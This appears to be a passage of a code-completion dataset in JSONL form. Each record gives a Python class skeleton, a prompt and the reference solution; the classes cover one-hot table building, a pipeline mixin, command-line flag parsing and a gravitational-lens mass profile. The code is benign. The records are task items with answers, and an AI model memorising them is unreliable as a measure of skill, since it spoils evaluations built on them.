feature_index = range(1, len(feature_id) + 1)\n if feature in ['policy', 'city']:\n feature_dict = dict(zip(feature_id, feature_id))\n else:\n feature_dict = dict(zip(feature_id, feature_index))\n return feature_dict\n<|end_body_1|>\n\n<|body_start_2|>\n feature_dict = self.get_feature_dict(feature_name)\n index_in_group = 1\n for key, value in feature_dict.items():\n temp_dict = OrderedDict()\n temp_dict['id'] = feature_name + '_' + str(value)\n temp_dict['index'] = self.table_index\n temp_dict['debug_doc'] = prefix_str + key\n temp_dict['group'] = feature_name\n temp_dict['id_in_group'] = key\n temp_dict['index_in_group'] = index_in_group\n index_in_group += 1\n self.table_index += 1\n self.table_list.append(temp_dict)\n<|end_body_2|>\n\n<|body_start_3|>\n for feature_name, prefix_str in zip(self.feature_list, self.prefix_list):\n self.get_table_list(feature_name, prefix_str)\n table_size = len(self.table_list)\n table_dict = OrderedDict()\n table_dict['size'] = 
table_size\n table_dict['values'] = self.table_list\n with open(path + 'format_table.json', 'w') as outfile:\n json.dump(table_dict, outfile, ensure_ascii=False)\n<|end_body_3|>\n", "revision_id": "c3c453f402bedc7a22dc0f873a602180f94678ef", "skeleton": "<|skeleton|>\nclass Table:\n \"\"\"模型字段one-hot编码映射表\"\"\"\n\n def __init__(self, df, feature_list, prefix_list):\n \"\"\":param df: :param feature_list: :param prefix_list:\"\"\"\n <|body_0|>\n\n def get_feature_dict(self, feature):\n \"\"\":param feature: :return:\"\"\"\n <|body_1|>\n\n def get_table_list(self, feature_name, prefix_str):\n \"\"\":param feature_name: :param prefix_str: :return:\"\"\"\n <|body_2|>\n\n def get_format_table(self, path):\n \"\"\":param path: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Table:\n \"\"\"模型字段one-hot编码映射表\"\"\"\n\n def __init__(self, df, feature_list, prefix_list):\n \"\"\":param df: :param feature_list: :param prefix_list:\"\"\"\n self.df = df\n self.table_list = []\n self.table_index = 0\n self.feature_list = feature_list\n self.prefix_list = prefix_list\n\n def get_feature_dict(self, feature):\n \"\"\":param feature: :return:\"\"\"\n self.df[feature] = self.df[feature].astype('category')\n feature_id = self.df[feature].cat.categories\n feature_index = range(1, len(feature_id) + 1)\n if feature in ['policy', 'city']:\n feature_dict = dict(zip(feature_id, feature_id))\n else:\n feature_dict = dict(zip(feature_id, feature_index))\n return feature_dict\n\n def get_table_list(self, feature_name, prefix_str):\n \"\"\":param feature_name: :param prefix_str: :return:\"\"\"\n feature_dict = self.get_feature_dict(feature_name)\n index_in_group = 1\n for key, value in feature_dict.items():\n temp_dict = OrderedDict()\n temp_dict['id'] = feature_name + '_' + str(value)\n temp_dict['index'] = self.table_index\n temp_dict['debug_doc'] = prefix_str + key\n temp_dict['group'] = feature_name\n temp_dict['id_in_group'] = key\n temp_dict['index_in_group'] = index_in_group\n index_in_group += 1\n self.table_index += 1\n self.table_list.append(temp_dict)\n\n def get_format_table(self, path):\n \"\"\":param path: :return:\"\"\"\n for feature_name, prefix_str in zip(self.feature_list, self.prefix_list):\n self.get_table_list(feature_name, prefix_str)\n table_size = len(self.table_list)\n table_dict = OrderedDict()\n table_dict['size'] = table_size\n table_dict['values'] = self.table_list\n with open(path + 'format_table.json', 'w') as outfile:\n json.dump(table_dict, outfile, ensure_ascii=False)\n", "source": "the_stack_v2_python_sparse", "source_path": "insurance/data/format_table.py", "source_repo": "StevenYang88/tuanxian_price", "split": "test", "star_events_count": 0} {"blob_id": "9750f9c0d3e432c43d6dcf4bd5c1eee8f5beeaba", "bodies": ["if hasattr(self, '_owning_pipeline') and self._owning_pipeline is not None:\n return self._owning_pipeline\nelse:\n return self.parent().owning_pipeline", "if self.owning_pipeline is None:\n return []\nreturn list(self.owning_pipeline.filtered_sessions.keys())", "if self.owning_pipeline is None:\n return []\nreturn self.owning_pipeline.filtered_contexts", "if self.owning_pipeline is None:\n return []\nreturn [a_context.get_description() for a_context in self.owning_pipeline.filtered_contexts.values()]"], "bodies_text": "<|body_start_0|>\n if hasattr(self, '_owning_pipeline') and self._owning_pipeline is not None:\n return self._owning_pipeline\n else:\n 
return self.parent().owning_pipeline\n<|end_body_0|>\n\n<|body_start_1|>\n if self.owning_pipeline is None:\n return []\n return list(self.owning_pipeline.filtered_sessions.keys())\n<|end_body_1|>\n\n<|body_start_2|>\n if self.owning_pipeline is None:\n return []\n return self.owning_pipeline.filtered_contexts\n<|end_body_2|>\n\n<|body_start_3|>\n if self.owning_pipeline is None:\n return []\n return [a_context.get_description() for a_context in self.owning_pipeline.filtered_contexts.values()]\n<|end_body_3|>\n", "class_docstring": "Implementors own a pipeline or have access through a parent", "class_name": "PipelineOwningMixin", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PipelineOwningMixin:\n \"\"\"Implementors own a pipeline or have access through a parent\"\"\"\n\n def owning_pipeline(self):\n \"\"\"The owning_pipeline property.\"\"\"\n <|body_0|>\n\n def all_filtered_session_keys(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n <|body_1|>\n\n def all_filtered_session_contexts(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n <|body_2|>\n\n def all_filtered_session_context_descriptions(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if hasattr(self, '_owning_pipeline') and self._owning_pipeline is not None:\n return self._owning_pipeline\n else:\n return self.parent().owning_pipeline\n<|end_body_0|>\n\n<|body_start_1|>\n if self.owning_pipeline is None:\n return []\n return list(self.owning_pipeline.filtered_sessions.keys())\n<|end_body_1|>\n\n<|body_start_2|>\n if self.owning_pipeline is None:\n return []\n return self.owning_pipeline.filtered_contexts\n<|end_body_2|>\n\n<|body_start_3|>\n if self.owning_pipeline is None:\n return []\n return [a_context.get_description() for a_context in self.owning_pipeline.filtered_contexts.values()]\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000448", "length_bytes": 1315, "license_type": "permissive", "methods": [{"docstring": "The owning_pipeline property.", "name": "owning_pipeline", "signature": "def owning_pipeline(self)"}, {"docstring": "Gets the names of the filters applied and updates the config rows with them.", "name": "all_filtered_session_keys", "signature": "def all_filtered_session_keys(self)"}, {"docstring": "Gets the names of the filters applied and updates the config rows with them.", "name": "all_filtered_session_contexts", "signature": "def all_filtered_session_contexts(self)"}, {"docstring": "Gets the names of the filters applied and updates the config rows with them.", "name": "all_filtered_session_context_descriptions", "signature": "def all_filtered_session_context_descriptions(self)"}], "n_methods": 4, "prompt": "Implement the Python class `PipelineOwningMixin` described below.\n\nClass description:\nImplementors own a pipeline or have access through a parent\n\nMethod signatures and docstrings:\n- def owning_pipeline(self): The owning_pipeline property.\n- def all_filtered_session_keys(self): Gets the names of the filters applied and updates the config rows with them.\n- def all_filtered_session_contexts(self): Gets the names of the filters applied and updates the config rows with them.\n- def all_filtered_session_context_descriptions(self): Gets the names of the filters applied and updates the config rows with them.", 
"prompted_full_text": "Implement the Python class `PipelineOwningMixin` described below.\n\nClass description:\nImplementors own a pipeline or have access through a parent\n\nMethod signatures and docstrings:\n- def owning_pipeline(self): The owning_pipeline property.\n- def all_filtered_session_keys(self): Gets the names of the filters applied and updates the config rows with them.\n- def all_filtered_session_contexts(self): Gets the names of the filters applied and updates the config rows with them.\n- def all_filtered_session_context_descriptions(self): Gets the names of the filters applied and updates the config rows with them.\n\n<|skeleton|>\nclass PipelineOwningMixin:\n \"\"\"Implementors own a pipeline or have access through a parent\"\"\"\n\n def owning_pipeline(self):\n \"\"\"The owning_pipeline property.\"\"\"\n <|body_0|>\n\n def all_filtered_session_keys(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n <|body_1|>\n\n def all_filtered_session_contexts(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n <|body_2|>\n\n def all_filtered_session_context_descriptions(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if hasattr(self, '_owning_pipeline') and self._owning_pipeline is not None:\n return self._owning_pipeline\n else:\n return self.parent().owning_pipeline\n<|end_body_0|>\n\n<|body_start_1|>\n if self.owning_pipeline is None:\n return []\n return list(self.owning_pipeline.filtered_sessions.keys())\n<|end_body_1|>\n\n<|body_start_2|>\n if self.owning_pipeline is None:\n return []\n return self.owning_pipeline.filtered_contexts\n<|end_body_2|>\n\n<|body_start_3|>\n if self.owning_pipeline is None:\n return []\n return [a_context.get_description() for a_context in self.owning_pipeline.filtered_contexts.values()]\n<|end_body_3|>\n", "revision_id": "212399d826284b394fce8894ff1a93133aef783f", "skeleton": "<|skeleton|>\nclass PipelineOwningMixin:\n \"\"\"Implementors own a pipeline or have access through a parent\"\"\"\n\n def owning_pipeline(self):\n \"\"\"The owning_pipeline property.\"\"\"\n <|body_0|>\n\n def all_filtered_session_keys(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n <|body_1|>\n\n def all_filtered_session_contexts(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n <|body_2|>\n\n def all_filtered_session_context_descriptions(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PipelineOwningMixin:\n \"\"\"Implementors own a pipeline or have access through a parent\"\"\"\n\n def owning_pipeline(self):\n \"\"\"The owning_pipeline property.\"\"\"\n if hasattr(self, '_owning_pipeline') and self._owning_pipeline is not None:\n return self._owning_pipeline\n else:\n return self.parent().owning_pipeline\n\n def all_filtered_session_keys(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n if self.owning_pipeline is None:\n return []\n return list(self.owning_pipeline.filtered_sessions.keys())\n\n def all_filtered_session_contexts(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with 
them.\"\"\"\n if self.owning_pipeline is None:\n return []\n return self.owning_pipeline.filtered_contexts\n\n def all_filtered_session_context_descriptions(self):\n \"\"\"Gets the names of the filters applied and updates the config rows with them.\"\"\"\n if self.owning_pipeline is None:\n return []\n return [a_context.get_description() for a_context in self.owning_pipeline.filtered_contexts.values()]\n", "source": "the_stack_v2_python_sparse", "source_path": "src/pyphoplacecellanalysis/GUI/Qt/Mixins/PipelineOwningMixin.py", "source_repo": "CommanderPho/pyPhoPlaceCellAnalysis", "split": "test", "star_events_count": 1} {"blob_id": "1ef333f8b0c9749f64f2b17ccfcd2fa3e3255666", "bodies": ["object.__setattr__(self, 'flag_value_map', self._create_flag_value_map(flags_in_scope))\nobject.__setattr__(self, 'namespace', namespace)\nobject.__setattr__(self, 'passthrough_args', passthrough_args)\nobject.__setattr__(self, 'allow_unknown_flags', allow_unknown_flags)", "flag_value_map: DefaultDict[str, list[str | None]] = defaultdict(list)\nfor flag in flags:\n flag_val: str | None\n key, has_equals_sign, flag_val = flag.partition('=')\n if not has_equals_sign:\n if not flag.startswith('--'):\n key = flag[0:2]\n flag_val = flag[2:]\n if not flag_val:\n flag_val = None\n flag_value_map[key].append(flag_val)\nreturn flag_value_map"], "bodies_text": "<|body_start_0|>\n object.__setattr__(self, 'flag_value_map', self._create_flag_value_map(flags_in_scope))\n object.__setattr__(self, 'namespace', namespace)\n object.__setattr__(self, 'passthrough_args', passthrough_args)\n object.__setattr__(self, 'allow_unknown_flags', allow_unknown_flags)\n<|end_body_0|>\n\n<|body_start_1|>\n flag_value_map: DefaultDict[str, list[str | None]] = defaultdict(list)\n for flag in flags:\n flag_val: str | None\n key, has_equals_sign, flag_val = flag.partition('=')\n if not has_equals_sign:\n if not flag.startswith('--'):\n key = flag[0:2]\n flag_val = flag[2:]\n if not flag_val:\n flag_val = None\n flag_value_map[key].append(flag_val)\n return flag_value_map\n<|end_body_1|>\n", "class_docstring": "", "class_name": "ParseArgsRequest", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ParseArgsRequest:\n\n def __init__(self, flags_in_scope: Iterable[str], namespace: OptionValueContainerBuilder, passthrough_args: list[str], allow_unknown_flags: bool) -> None:\n \"\"\":param flags_in_scope: Iterable of arg strings to parse into flag values. :param namespace: The object to register the flag values on\"\"\"\n <|body_0|>\n\n def _create_flag_value_map(flags: Iterable[str]) -> DefaultDict[str, list[str | None]]:\n \"\"\"Returns a map of flag -> list of values, based on the given flag strings. None signals no value given (e.g., -x, --foo). 
The value is a list because the user may specify the same flag multiple times, and that's sometimes OK (e.g., when appending to list- valued options).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n object.__setattr__(self, 'flag_value_map', self._create_flag_value_map(flags_in_scope))\n object.__setattr__(self, 'namespace', namespace)\n object.__setattr__(self, 'passthrough_args', passthrough_args)\n object.__setattr__(self, 'allow_unknown_flags', allow_unknown_flags)\n<|end_body_0|>\n\n<|body_start_1|>\n flag_value_map: DefaultDict[str, list[str | None]] = defaultdict(list)\n for flag in flags:\n flag_val: str | None\n key, has_equals_sign, flag_val = flag.partition('=')\n if not has_equals_sign:\n if not flag.startswith('--'):\n key = flag[0:2]\n flag_val = flag[2:]\n if not flag_val:\n flag_val = None\n flag_value_map[key].append(flag_val)\n return flag_value_map\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000449", "length_bytes": 32099, "license_type": "permissive", "methods": [{"docstring": ":param flags_in_scope: Iterable of arg strings to parse into flag values. :param namespace: The object to register the flag values on", "name": "__init__", "signature": "def __init__(self, flags_in_scope: Iterable[str], namespace: OptionValueContainerBuilder, passthrough_args: list[str], allow_unknown_flags: bool) -> None"}, {"docstring": "Returns a map of flag -> list of values, based on the given flag strings. None signals no value given (e.g., -x, --foo). The value is a list because the user may specify the same flag multiple times, and that's sometimes OK (e.g., when appending to list- valued options).", "name": "_create_flag_value_map", "signature": "def _create_flag_value_map(flags: Iterable[str]) -> DefaultDict[str, list[str | None]]"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001215", "prompt": "Implement the Python class `ParseArgsRequest` described below.\n\nClass description:\nImplement the ParseArgsRequest class.\n\nMethod signatures and docstrings:\n- def __init__(self, flags_in_scope: Iterable[str], namespace: OptionValueContainerBuilder, passthrough_args: list[str], allow_unknown_flags: bool) -> None: :param flags_in_scope: Iterable of arg strings to parse into flag values. :param namespace: The object to register the flag values on\n- def _create_flag_value_map(flags: Iterable[str]) -> DefaultDict[str, list[str | None]]: Returns a map of flag -> list of values, based on the given flag strings. None signals no value given (e.g., -x, --foo). The value is a list because the user may specify the same flag multiple times, and that's sometimes OK (e.g., when appending to list- valued options).", "prompted_full_text": "Implement the Python class `ParseArgsRequest` described below.\n\nClass description:\nImplement the ParseArgsRequest class.\n\nMethod signatures and docstrings:\n- def __init__(self, flags_in_scope: Iterable[str], namespace: OptionValueContainerBuilder, passthrough_args: list[str], allow_unknown_flags: bool) -> None: :param flags_in_scope: Iterable of arg strings to parse into flag values. :param namespace: The object to register the flag values on\n- def _create_flag_value_map(flags: Iterable[str]) -> DefaultDict[str, list[str | None]]: Returns a map of flag -> list of values, based on the given flag strings. None signals no value given (e.g., -x, --foo). 
The value is a list because the user may specify the same flag multiple times, and that's sometimes OK (e.g., when appending to list- valued options).\n\n<|skeleton|>\nclass ParseArgsRequest:\n\n def __init__(self, flags_in_scope: Iterable[str], namespace: OptionValueContainerBuilder, passthrough_args: list[str], allow_unknown_flags: bool) -> None:\n \"\"\":param flags_in_scope: Iterable of arg strings to parse into flag values. :param namespace: The object to register the flag values on\"\"\"\n <|body_0|>\n\n def _create_flag_value_map(flags: Iterable[str]) -> DefaultDict[str, list[str | None]]:\n \"\"\"Returns a map of flag -> list of values, based on the given flag strings. None signals no value given (e.g., -x, --foo). The value is a list because the user may specify the same flag multiple times, and that's sometimes OK (e.g., when appending to list- valued options).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n object.__setattr__(self, 'flag_value_map', self._create_flag_value_map(flags_in_scope))\n object.__setattr__(self, 'namespace', namespace)\n object.__setattr__(self, 'passthrough_args', passthrough_args)\n object.__setattr__(self, 'allow_unknown_flags', allow_unknown_flags)\n<|end_body_0|>\n\n<|body_start_1|>\n flag_value_map: DefaultDict[str, list[str | None]] = defaultdict(list)\n for flag in flags:\n flag_val: str | None\n key, has_equals_sign, flag_val = flag.partition('=')\n if not has_equals_sign:\n if not flag.startswith('--'):\n key = flag[0:2]\n flag_val = flag[2:]\n if not flag_val:\n flag_val = None\n flag_value_map[key].append(flag_val)\n return flag_value_map\n<|end_body_1|>\n", "revision_id": "98cbda8545f0d58c586ed2daa76fefd729d5e0d5", "skeleton": "<|skeleton|>\nclass ParseArgsRequest:\n\n def __init__(self, flags_in_scope: Iterable[str], namespace: OptionValueContainerBuilder, passthrough_args: list[str], allow_unknown_flags: bool) -> None:\n \"\"\":param flags_in_scope: Iterable of arg strings to parse into flag values. :param namespace: The object to register the flag values on\"\"\"\n <|body_0|>\n\n def _create_flag_value_map(flags: Iterable[str]) -> DefaultDict[str, list[str | None]]:\n \"\"\"Returns a map of flag -> list of values, based on the given flag strings. None signals no value given (e.g., -x, --foo). The value is a list because the user may specify the same flag multiple times, and that's sometimes OK (e.g., when appending to list- valued options).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ParseArgsRequest:\n def __init__(self, flags_in_scope: Iterable[str], namespace: OptionValueContainerBuilder, passthrough_args: list[str], allow_unknown_flags: bool) -> None:\n \"\"\":param flags_in_scope: Iterable of arg strings to parse into flag values. :param namespace: The object to register the flag values on\"\"\"\n object.__setattr__(self, 'flag_value_map', self._create_flag_value_map(flags_in_scope))\n object.__setattr__(self, 'namespace', namespace)\n object.__setattr__(self, 'passthrough_args', passthrough_args)\n object.__setattr__(self, 'allow_unknown_flags', allow_unknown_flags)\n\n def _create_flag_value_map(flags: Iterable[str]) -> DefaultDict[str, list[str | None]]:\n \"\"\"Returns a map of flag -> list of values, based on the given flag strings. None signals no value given (e.g., -x, --foo). 
The value is a list because the user may specify the same flag multiple times, and that's sometimes OK (e.g., when appending to list- valued options).\"\"\"\n flag_value_map: DefaultDict[str, list[str | None]] = defaultdict(list)\n for flag in flags:\n flag_val: str | None\n key, has_equals_sign, flag_val = flag.partition('=')\n if not has_equals_sign:\n if not flag.startswith('--'):\n key = flag[0:2]\n flag_val = flag[2:]\n if not flag_val:\n flag_val = None\n flag_value_map[key].append(flag_val)\n return flag_value_map\n", "source": "the_stack_v2_python_sparse", "source_path": "src/python/pants/option/parser.py", "source_repo": "pantsbuild/pants", "split": "test", "star_events_count": 2708} {"blob_id": "61e7b7dc054a879b0886ebc436cc07266c17dd78", "bodies": ["z = jnp.exp(-1j * angle) * (x - center_x + (y - center_y) * 1j)\nscale_length = theta_e * jnp.sqrt(axis_ratio)\ncomplex_derivative = EPL._complex_derivative(z.real, z.imag, scale_length, axis_ratio, slope) * jnp.exp(1j * angle)\nreturn (complex_derivative.real, complex_derivative.imag)", "ellip_vector = x * axis_ratio + 1j * y\nellip_radius = jnp.abs(ellip_vector)\nellip_angle = jnp.angle(ellip_vector)\nomega = EPL._hypergeometric_series(ellip_angle, slope, axis_ratio)\nreturn 2 * scale_length / (1 + axis_ratio) * jnp.nan_to_num((scale_length / ellip_radius) ** (slope - 2), copy=False) * omega", "flattening = (1 - axis_ratio) / (1 + axis_ratio)\nomegas = jnp.zeros_like(ellip_angle)\nfour_n = 1 * jnp.exp(1j * ellip_angle)\nomegas += four_n\nfour_factor = -flattening * jnp.exp(2j * ellip_angle)\nfor n in range(1, 200):\n four_n *= (2 * n - (3 - slope)) / (2 * n + (3 - slope)) * four_factor\n omegas += four_n\nreturn omegas"], "bodies_text": "<|body_start_0|>\n z = jnp.exp(-1j * angle) * (x - center_x + (y - center_y) * 1j)\n scale_length = theta_e * jnp.sqrt(axis_ratio)\n complex_derivative = EPL._complex_derivative(z.real, z.imag, scale_length, axis_ratio, slope) * jnp.exp(1j * angle)\n return (complex_derivative.real, complex_derivative.imag)\n<|end_body_0|>\n\n<|body_start_1|>\n ellip_vector = x * axis_ratio + 1j * y\n ellip_radius = jnp.abs(ellip_vector)\n ellip_angle = jnp.angle(ellip_vector)\n omega = EPL._hypergeometric_series(ellip_angle, slope, axis_ratio)\n return 2 * scale_length / (1 + axis_ratio) * jnp.nan_to_num((scale_length / ellip_radius) ** (slope - 2), copy=False) * omega\n<|end_body_1|>\n\n<|body_start_2|>\n flattening = (1 - axis_ratio) / (1 + axis_ratio)\n omegas = jnp.zeros_like(ellip_angle)\n four_n = 1 * jnp.exp(1j * ellip_angle)\n omegas += four_n\n four_factor = -flattening * jnp.exp(2j * ellip_angle)\n for n in range(1, 200):\n four_n *= (2 * n - (3 - slope)) / (2 * n + (3 - slope)) * four_factor\n omegas += four_n\n return omegas\n<|end_body_2|>\n", "class_docstring": "Elliptical Power Law mass profile. Elliptical Power Law mass profile functions, with calculation following those described in Tessore & Metcalf (2015) and implementation closely following the EPL_numba class in Lenstronomy.", "class_name": "EPL", "detected_licenses": ["Apache-2.0", "CC-BY-4.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass EPL:\n \"\"\"Elliptical Power Law mass profile. 
Elliptical Power Law mass profile functions, with calculation following those described in Tessore & Metcalf (2015) and implementation closely following the EPL_numba class in Lenstronomy.\"\"\"\n\n def derivatives(x, y, theta_e, slope, axis_ratio, angle, center_x, center_y):\n \"\"\"Calculate the derivative of the potential for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. theta_e: Einstein radius of the EPL profile. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio of the major and minor axis of ellipticity. angle: Clockwise angle of orientation of major axis. center_x: X-coordinate center of the EPL profile. center_y: Y-coordinate cetner of the EPL profile. Returns: X- and y-component of the derivatives.\"\"\"\n <|body_0|>\n\n def _complex_derivative(x, y, scale_length, axis_ratio, slope):\n \"\"\"Calculate the complex derivative for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. scale_length: Scale length of the EPL mass profile (related to Einstein Radius by axis ratio). axis_ratio: Axis ratio of the major and minor axis of ellipticity. slope: Power-law slope of the EPL profile. Returns: Complex derivative at each (x,y) coordinate pair.\"\"\"\n <|body_1|>\n\n def _hypergeometric_series(ellip_angle, slope, axis_ratio):\n \"\"\"Calculate the hypergeometric series required for the derivative. Args: ellip_angle: The elliptical angles at which to evaluate the series. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio the major and minor axis of ellipticity. Returns: The hypergeometric series sum for each angle.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n z = jnp.exp(-1j * angle) * (x - center_x + (y - center_y) * 1j)\n scale_length = theta_e * jnp.sqrt(axis_ratio)\n complex_derivative = EPL._complex_derivative(z.real, z.imag, scale_length, axis_ratio, slope) * jnp.exp(1j * angle)\n return (complex_derivative.real, complex_derivative.imag)\n<|end_body_0|>\n\n<|body_start_1|>\n ellip_vector = x * axis_ratio + 1j * y\n ellip_radius = jnp.abs(ellip_vector)\n ellip_angle = jnp.angle(ellip_vector)\n omega = EPL._hypergeometric_series(ellip_angle, slope, axis_ratio)\n return 2 * scale_length / (1 + axis_ratio) * jnp.nan_to_num((scale_length / ellip_radius) ** (slope - 2), copy=False) * omega\n<|end_body_1|>\n\n<|body_start_2|>\n flattening = (1 - axis_ratio) / (1 + axis_ratio)\n omegas = jnp.zeros_like(ellip_angle)\n four_n = 1 * jnp.exp(1j * ellip_angle)\n omegas += four_n\n four_factor = -flattening * jnp.exp(2j * ellip_angle)\n for n in range(1, 200):\n four_n *= (2 * n - (3 - slope)) / (2 * n + (3 - slope)) * four_factor\n omegas += four_n\n return omegas\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000450", "length_bytes": 13457, "license_type": "permissive", "methods": [{"docstring": "Calculate the derivative of the potential for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. theta_e: Einstein radius of the EPL profile. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio of the major and minor axis of ellipticity. angle: Clockwise angle of orientation of major axis. center_x: X-coordinate center of the EPL profile. center_y: Y-coordinate cetner of the EPL profile. 
Returns: X- and y-component of the derivatives.", "name": "derivatives", "signature": "def derivatives(x, y, theta_e, slope, axis_ratio, angle, center_x, center_y)"}, {"docstring": "Calculate the complex derivative for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. scale_length: Scale length of the EPL mass profile (related to Einstein Radius by axis ratio). axis_ratio: Axis ratio of the major and minor axis of ellipticity. slope: Power-law slope of the EPL profile. Returns: Complex derivative at each (x,y) coordinate pair.", "name": "_complex_derivative", "signature": "def _complex_derivative(x, y, scale_length, axis_ratio, slope)"}, {"docstring": "Calculate the hypergeometric series required for the derivative. Args: ellip_angle: The elliptical angles at which to evaluate the series. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio the major and minor axis of ellipticity. Returns: The hypergeometric series sum for each angle.", "name": "_hypergeometric_series", "signature": "def _hypergeometric_series(ellip_angle, slope, axis_ratio)"}], "n_methods": 3, "prompt": "Implement the Python class `EPL` described below.\n\nClass description:\nElliptical Power Law mass profile. Elliptical Power Law mass profile functions, with calculation following those described in Tessore & Metcalf (2015) and implementation closely following the EPL_numba class in Lenstronomy.\n\nMethod signatures and docstrings:\n- def derivatives(x, y, theta_e, slope, axis_ratio, angle, center_x, center_y): Calculate the derivative of the potential for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. theta_e: Einstein radius of the EPL profile. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio of the major and minor axis of ellipticity. angle: Clockwise angle of orientation of major axis. center_x: X-coordinate center of the EPL profile. center_y: Y-coordinate cetner of the EPL profile. Returns: X- and y-component of the derivatives.\n- def _complex_derivative(x, y, scale_length, axis_ratio, slope): Calculate the complex derivative for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. scale_length: Scale length of the EPL mass profile (related to Einstein Radius by axis ratio). axis_ratio: Axis ratio of the major and minor axis of ellipticity. slope: Power-law slope of the EPL profile. Returns: Complex derivative at each (x,y) coordinate pair.\n- def _hypergeometric_series(ellip_angle, slope, axis_ratio): Calculate the hypergeometric series required for the derivative. Args: ellip_angle: The elliptical angles at which to evaluate the series. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio the major and minor axis of ellipticity. Returns: The hypergeometric series sum for each angle.", "prompted_full_text": "Implement the Python class `EPL` described below.\n\nClass description:\nElliptical Power Law mass profile. Elliptical Power Law mass profile functions, with calculation following those described in Tessore & Metcalf (2015) and implementation closely following the EPL_numba class in Lenstronomy.\n\nMethod signatures and docstrings:\n- def derivatives(x, y, theta_e, slope, axis_ratio, angle, center_x, center_y): Calculate the derivative of the potential for the EPL mass profile. 
Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. theta_e: Einstein radius of the EPL profile. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio of the major and minor axis of ellipticity. angle: Clockwise angle of orientation of major axis. center_x: X-coordinate center of the EPL profile. center_y: Y-coordinate cetner of the EPL profile. Returns: X- and y-component of the derivatives.\n- def _complex_derivative(x, y, scale_length, axis_ratio, slope): Calculate the complex derivative for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. scale_length: Scale length of the EPL mass profile (related to Einstein Radius by axis ratio). axis_ratio: Axis ratio of the major and minor axis of ellipticity. slope: Power-law slope of the EPL profile. Returns: Complex derivative at each (x,y) coordinate pair.\n- def _hypergeometric_series(ellip_angle, slope, axis_ratio): Calculate the hypergeometric series required for the derivative. Args: ellip_angle: The elliptical angles at which to evaluate the series. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio the major and minor axis of ellipticity. Returns: The hypergeometric series sum for each angle.\n\n<|skeleton|>\nclass EPL:\n \"\"\"Elliptical Power Law mass profile. Elliptical Power Law mass profile functions, with calculation following those described in Tessore & Metcalf (2015) and implementation closely following the EPL_numba class in Lenstronomy.\"\"\"\n\n def derivatives(x, y, theta_e, slope, axis_ratio, angle, center_x, center_y):\n \"\"\"Calculate the derivative of the potential for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. theta_e: Einstein radius of the EPL profile. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio of the major and minor axis of ellipticity. angle: Clockwise angle of orientation of major axis. center_x: X-coordinate center of the EPL profile. center_y: Y-coordinate cetner of the EPL profile. Returns: X- and y-component of the derivatives.\"\"\"\n <|body_0|>\n\n def _complex_derivative(x, y, scale_length, axis_ratio, slope):\n \"\"\"Calculate the complex derivative for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. scale_length: Scale length of the EPL mass profile (related to Einstein Radius by axis ratio). axis_ratio: Axis ratio of the major and minor axis of ellipticity. slope: Power-law slope of the EPL profile. Returns: Complex derivative at each (x,y) coordinate pair.\"\"\"\n <|body_1|>\n\n def 